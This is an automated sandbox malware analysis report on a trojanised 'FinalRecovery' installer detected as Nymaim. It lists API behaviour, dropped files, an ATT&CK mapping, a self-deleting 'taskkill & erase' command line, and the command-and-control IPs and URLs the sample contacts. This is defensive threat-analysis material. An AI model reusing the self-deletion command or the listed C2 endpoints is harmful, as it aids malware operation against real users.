              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpDropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpDropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-H9OSH.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpDropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,GetUserNameA,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B08 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00451DC0 FindFirstFileA,GetLastError,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00423DAD FindFirstFileExW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10007E39 FindFirstFileExW,
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0ex
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0042039F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00417B2F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10007A06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10005EB5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040F709 SetUnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040F575 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040EB52 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10005630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10002A85 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10002F80 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00476C24 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0042DF9C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,
              Source: finalrecovery.exe, 00000002.00000002.322749910.000000000341F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: finalrecovery.exe, 00000002.00000002.322749910.000000000341F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
              Source: finalrecovery.exe, 00000002.00000002.322749910.000000000341F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program manager#
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: GetLocaleInfoA,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: GetLocaleInfoA,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040F773 cpuid
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00457964 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026C4 GetSystemTime,
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405CBC GetVersionExA,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004547B8 GetUserNameA,

              Stealing of Sensitive Information

              barindex
              Yara detected Nymaim
              Source: Yara matchFile source: 2.2.finalrecovery.exe.19a0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.19a0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Windows Management Instrumentation              		Path Interception1
              Exploitation for Privilege Escalation              		1
              Disable or Modify Tools              		1
              Input Capture              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium2
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts3
              Native API              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol1
              Input Capture              		Exfiltration Over Bluetooth2
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts12
              Command and Scripting Interpreter              		Logon Script (Windows)13
              Process Injection              		3
              Obfuscated Files or Information              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)23
              Software Packing              		NTDS26
              System Information Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer11
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Masquerading              		LSA Secrets141
              Security Software Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation              		Cached Domain Credentials3
              Process Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items13
              Process Injection              		DCSync11
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
              System Owner/User Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 791306 Sample: file.exe Startdate: 25/01/2023 Architecture: WINDOWS Score: 92 48 45.12.253.98 CMCSUS Germany 2->48 50 Snort IDS alert for network traffic 2->50 52 Detected unpacking (changes PE section rights) 2->52 54 Detected unpacking (overwrites its own PE header) 2->54 56 3 other signatures 2->56 10 file.exe 2 2->10         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32 10->32 dropped 60 Obfuscated command line found 10->60 14 file.tmp 18 16 10->14         started        signatures6 process7 file8 34 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 14->34 dropped 36 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 14->36 dropped 38 C:\Users\user\AppData\Local\...\_RegDLL.tmp, PE32 14->38 dropped 40 6 other files (5 malicious) 14->40 dropped 17 finalrecovery.exe 24 14->17         started        process9 dnsIp10 42 45.12.253.56, 49701, 80 CMCSUS Germany 17->42 44 45.12.253.72, 49702, 80 CMCSUS Germany 17->44 46 45.12.253.75, 49703, 80 CMCSUS Germany 17->46 30 C:\Users\user\AppData\Roaming\...\wEQg8.exe, PE32 17->30 dropped 21 wEQg8.exe 17->21         started        24 cmd.exe 1 17->24         started        file11 process12 signatures13 58 Multi AV Scanner detection for dropped file 21->58 26 taskkill.exe 1 24->26         started        28 conhost.exe 24->28         started        process14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe100%Joe Sandbox ML
              C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)0%ReversingLabs
              C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-J1RPT.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_iscrypt.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_shfoldr.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp2%ReversingLabs
              C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe60%ReversingLabsWin32.Trojan.GenusAgent

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.2.file.tmp.400000.0.unpack100%AviraTR/Dropper.GenDownload File
              2.2.finalrecovery.exe.400000.1.unpack100%AviraHEUR/AGEN.1250671Download File
              0.2.file.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
              0.3.file.exe.23c75c8.0.unpack100%AviraTR/Patched.Ren.GenDownload File
              1.0.file.tmp.4b375c.3.unpack100%AviraTR/Patched.Ren.GenDownload File
              0.3.file.exe.21db608.3.unpack100%AviraTR/Patched.Ren.GenDownload File
              1.2.file.tmp.4b375c.3.unpack100%AviraTR/Patched.Ren.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.innosetup.com/0%URL Reputationsafe
              http://45.12.253.72/default/stuk.php0%URL Reputationsafe
              http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte0%URL Reputationsafe
              http://www.remobjects.com/psU0%URL Reputationsafe
              http://45.12.253.72/default/puk.php0%URL Reputationsafe
              http://45.12.253.75/dll.php0%URL Reputationsafe
              http://www.finalrecovery.com/buy.htm0%URL Reputationsafe
              http://www.remobjects.com/ps0%URL Reputationsafe
              http://45.12.253.75/dll.phpd0%Avira URL Cloudsafe
              http://45.12.253.75/dll.phpc0%Avira URL Cloudsafe
              http://45.12.253.75/dll.phpK0%Avira URL Cloudsafe
              http://45.12.253.75/dll.phpL0%Avira URL Cloudsafe
              http://45.12.253.75/dll.phpi0%Avira URL Cloudsafe
              http://45.120%Avira URL Cloudsafe
              http://45.12.253.75/dll.phpQ0%Avira URL Cloudsafe
              http://45.12.253.75/dll.phprl0%Avira URL Cloudsafe
              http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteY0%Avira URL Cloudsafe
              http://45.12.253.75/dll.phpr0%Avira URL Cloudsafe
              http://nbafrog.com/0%Avira URL Cloudsafe
              http://nbafrog.com/.0%Avira URL Cloudsafe
              http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteeF0%Avira URL Cloudsafe
              http://45.12.253.72/default/stuk.php2N0%Avira URL Cloudsafe
              http://45.12.253.75/dll.phpx0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://45.12.253.72/default/stuk.phptrue
              • URL Reputation: safe
              		unknown
              http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixintetrue
              • URL Reputation: safe
              		unknown
              http://45.12.253.72/default/puk.phptrue
              • URL Reputation: safe
              		unknown
              http://45.12.253.75/dll.phptrue
              • URL Reputation: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://45.12.253.75/dll.phpcfinalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.innosetup.com/file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.drfalse
              • URL Reputation: safe
              		unknown
              http://45.12.253.75/dll.phpdfinalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.remobjects.com/psUfile.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.drfalse
              • URL Reputation: safe
              		unknown
              http://45.12.253.75/dll.phpKfinalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://45.12.253.75/dll.phpLfinalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://45.12finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://45.12.253.75/dll.phpifinalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://45.12.253.75/dll.phpQfinalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://45.12.253.75/dll.phprlfinalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.finalrecovery.com/buy.htmis-6R8AD.tmp.1.drfalse
              • URL Reputation: safe
              		unknown
              http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteYfinalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://45.12.253.75/dll.phprfinalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.remobjects.com/psfile.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.drfalse
              • URL Reputation: safe
              		unknown
              http://nbafrog.com/file.tmp, 00000001.00000002.323445536.00000000022C7000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nbafrog.com/.file.exe, 00000000.00000003.324486104.0000000002131000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241488665.0000000002131000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.242648810.00000000022D8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.323445536.00000000022C7000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteeFfinalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://45.12.253.72/default/stuk.php2Nfinalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://45.12.253.75/dll.phpxfinalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              45.12.253.72
              		unknownGermany
              		33657CMCSUStrue
              45.12.253.75
              		unknownGermany
              		33657CMCSUStrue
              45.12.253.98
              		unknownGermany
              		33657CMCSUStrue
              45.12.253.56
              		unknownGermany
              		33657CMCSUStrue

              General Information

              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:791306
              Start date and time:2023-01-25 10:16:08 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 7m 56s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:file.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal92.troj.evad.winEXE@12/24@0/4
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 38.4% (good quality ratio 37.3%)
              • Quality average: 81.3%
              • Quality standard deviation: 24.7%
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
